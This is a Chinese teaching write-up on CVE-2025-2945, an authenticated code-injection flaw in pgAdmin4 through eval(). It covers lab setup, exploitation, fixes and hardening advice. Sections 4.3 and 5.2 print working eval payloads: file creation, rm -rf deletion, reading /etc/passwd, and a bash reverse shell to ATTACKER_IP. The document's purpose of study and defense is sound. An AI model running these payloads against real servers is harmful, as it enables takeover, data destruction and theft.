CVE-2025-2945：pgAdmin4 认证后远程代码执行漏洞教学文档<\/strong><\/h2>
1. 漏洞概述<\/strong><\/h3>
漏洞编号<\/strong>：CVE-2025-2945<\/p>
漏洞名称<\/strong>：pgAdmin4 认证后远程代码执行漏洞<\/p>
漏洞类型<\/strong>：不安全反序列化 \/ 代码注入<\/p>
威胁等级<\/strong>：高危 (High) \/ 严重 (Critical)<\/p>
受影响版本<\/strong>：pgAdmin4 版本 <= 9.1<\/p>
修复版本<\/strong>：pgAdmin4 >= 9.2<\/p>
前置条件<\/strong>：攻击者需要拥有一个有效的 pgAdmin4 用户账户（即经过身份验证）。<\/p>
2. 组件介绍<\/strong><\/h3>
pgAdmin4<\/strong> 是一个流行且功能丰富的 PostgreSQL 开源管理和开发平台。它提供了一个基于 Web 的图形化界面，允许数据库管理员和开发人员轻松地管理 PostgreSQL 数据库实例，执行 SQL 查询，管理数据库对象等，被广泛使用。<\/p>
3. 漏洞详细描述<\/strong><\/h3>
该漏洞的本质是代码注入<\/strong>，根源在于 pgAdmin4 应用程序对用户输入的处理不当。具体来说，漏洞存在于两个特定的 POST 请求接口中：<\/p>

SQL 查询编辑器下载功能<\/strong>：接口路径为 \/sqleditor\/query_tool\/download<\/code><\/li>
云部署模块<\/strong>：接口路径为 \/cloud\/deploy<\/code><\/li> <\/ol> 在这两个接口的请求处理逻辑中，应用程序将用户可控的请求参数（query_commited<\/code> 和 high_availability<\/code>）未经过任何安全过滤或验证，直接传递给了 Python 内置的危险函数 eval()<\/code>。<\/p> eval()<\/code> 函数的作用<\/strong>：该函数会将其接收到的字符串参数当作有效的 Python 代码来执行。由于攻击者可以控制传入的参数，他们就可以构造恶意的 Python 代码字符串，从而在运行 pgAdmin4 服务的服务器上以该服务进程的权限（通常是较高的权限）执行任意系统命令。<\/p> 4. 漏洞复现与环境搭建<\/strong><\/h3> 4.1 环境准备<\/strong><\/h4> 为了安全地学习和验证此漏洞，建议在隔离的虚拟机或 Docker 环境中进行。<\/p> 获取漏洞环境<\/strong>：可以使用 Vulhub 这类开源漏洞靶场项目。<\/li> 定位漏洞环境<\/strong>：进入 Vulhub 项目目录，找到 pgadmin\/CVE-2025-2945<\/code> 相关的文件夹。<\/li> 启动靶机<\/strong>：根据 Vulhub 的说明文档，使用 docker-compose up -d<\/code> 命令启动包含漏洞版本的 pgAdmin4 容器。<\/li> <\/ol> 4.2 访问与认证<\/strong><\/h4> 启动成功后，Vulhub 会提示访问的 IP 地址和端口号，例如 http:\/\/192.168.1.10:8080<\/code>。<\/li> 使用浏览器访问该地址，会看到 pgAdmin4 的登录界面。<\/li> 你需要使用预设的或自己配置的账号密码进行登录。成功登录是触发该漏洞的必要前提<\/strong>。<\/li> <\/ol> 4.3 利用漏洞执行命令<\/strong><\/h4> 登录后，攻击者可以利用公开的 Expolit (EXP) 脚本向目标发送恶意构造的 POST 请求。<\/p> 漏洞验证步骤<\/strong>：<\/p> 编写 EXP 脚本<\/strong>：创建一个 Python 脚本，使用 requests<\/code> 库来发送 POST 请求。脚本需要先进行登录，获取并维护会话 Cookie。<\/li> 构造恶意载荷<\/strong>：以创建文件为例，向 \/sqleditor\/query_tool\/download<\/code> 接口发送 POST 请求，在 query_commited<\/code> 参数中填入以下代码： __import__('os'<\/span>).<\/span>system('touch \/tmp\/hack.txt'<\/span>) <\/span><\/span><\/code><\/pre>这段代码会调用操作系统命令，在服务器的 \/tmp<\/code> 目录下创建一个名为 hack.txt<\/code> 的空文件。<\/li> 执行 EXP 脚本<\/strong>：运行编写好的脚本。<\/li> 验证执行结果<\/strong>：进入运行 pgAdmin4 的 Docker 容器或服务器，检查 \/tmp<\/code> 目录下是否成功创建了 hack.txt<\/code> 文件。如果文件存在，则证明远程代码执行成功。<\/li> <\/ol> 5. 漏洞技术深度分析<\/strong><\/h3> 5.1 漏洞触发点<\/strong><\/h4> 危险函数<\/strong>：eval()<\/code><\/li> 可控参数<\/strong>： query_commited<\/code> （位于 \/sqleditor\/query_tool\/download<\/code> 接口）<\/li> high_availability<\/code> （位于 \/cloud\/deploy<\/code> 接口）<\/li> <\/ul> <\/li> 攻击流程<\/strong>：用户输入 -> 未经处理 -> eval() 执行 -> 系统命令执行<\/code><\/li> <\/ul> 5.2 攻击载荷分析<\/strong><\/h4> 攻击者可以构造多种危险的载荷来实现不同目的：<\/p> 文件操作<\/strong>：<\/p> # 删除重要文件（破坏性操作，谨慎使用）<\/span> <\/span><\/span>__import__('os'<\/span>).<\/span>system('rm -rf \/important\/files'<\/span>) <\/span><\/span> <\/span><\/span># 查看系统敏感信息<\/span> <\/span><\/span>__import__('os'<\/span>).<\/span>system('cat \/etc\/passwd'<\/span>) <\/span><\/span><\/code><\/pre><\/li> 获取反向 Shell（最高危）<\/strong>：这是最危险的攻击方式，它能让攻击者获得一个交互式的命令行 shell，完全控制服务器。<\/p> __import__('subprocess'<\/span>).<\/span>run(['bash'<\/span>, '-c'<\/span>, "bash -i >& \/dev\/tcp\/ATTACKER_IP\/ATTACKER_PORT 0>&1"<\/span>]) <\/span><\/span><\/code><\/pre>解释<\/strong>：<\/p> ATTACKER_IP<\/code>：替换为攻击者自己服务器的 IP 地址。<\/li> ATTACKER_PORT<\/code>：替换为攻击者服务器上监听的端口。<\/li> 执行该命令后，受害服务器会主动向攻击者的机器建立一个 TCP 连接，并将 bash shell 的标准输入、输出和错误流重定向到该网络连接上。<\/li> <\/ul> <\/li> <\/ul> 5.3 修复方案<\/strong><\/h4> 官方在 pgAdmin4 9.2 版本中修复了此漏洞。修复方法通常是：<\/p> 移除 eval()<\/code><\/strong>：从根本上避免使用不安全的函数，寻找功能相同的安全替代方案。<\/li> 严格输入验证<\/strong>：如果必须使用动态逻辑，应对用户输入进行严格的白名单验证，只允许预期的、安全的字符和结构。<\/li> 使用安全函数<\/strong>：例如，对于将字符串转换为字典或元组等需求，应使用 ast.literal_eval()<\/code> 等更安全的函数，它只能评估字面量数据结构，而不能执行任意代码。<\/li> <\/ol> 6. 总结与防护建议<\/strong><\/h3> 总结<\/strong><\/h4> CVE-2025-2945 是一个典型的“认证后”代码注入漏洞。其危害性极高，因为一旦攻击者获得了一个低权限的应用程序账户（例如通过钓鱼、弱口令爆破等方式），就可以直接提升权限到服务器系统层面，导致数据泄露、服务中断乃至整个服务器被控。<\/p> 给系统管理员的防护建议<\/strong><\/h4> 立即升级<\/strong>：如果正在使用 pgAdmin4，请立即检查版本并升级到 9.2 或更高版本。这是最直接有效的防护措施。<\/li> 最小权限原则<\/strong>：运行 pgAdmin4 的服务进程应使用非 root 的低权限用户，以限制漏洞成功利用后造成的破坏范围。<\/li> 网络隔离<\/strong>：将 pgAdmin4 管理界面限制在内网访问，或通过 VPN 访问，避免直接暴露在公网。<\/li> 强密码策略<\/strong>：对所有 pgAdmin4 用户账户实施强密码策略，防止攻击者通过爆破等方式轻易获得认证凭证。<\/li> 定期安全审计<\/strong>：定期检查系统日志和 pgAdmin4 日志，监控可疑活动。<\/li> <\/ol> 给开发者的启示<\/strong><\/h4> 永远不要信任用户输入<\/strong>：对所有用户输入的数据都必须进行严格的验证和过滤。<\/li> 避免使用危险函数<\/strong>：如 eval()<\/code>、exec()<\/code>、pickle.loads()<\/code> 等，除非有绝对必要且已做好万无一失的安全措施。<\/li> 代码安全审计<\/strong>：在代码开发和安全测试阶段，应重点关注用户输入流入高风险函数的路径。<\/li> <\/ol> 免责声明<\/strong>：本文档仅用于网络安全教学和研究目的。请勿将文中所述技术用于任何非法或未经授权的测试活动中。<\/p>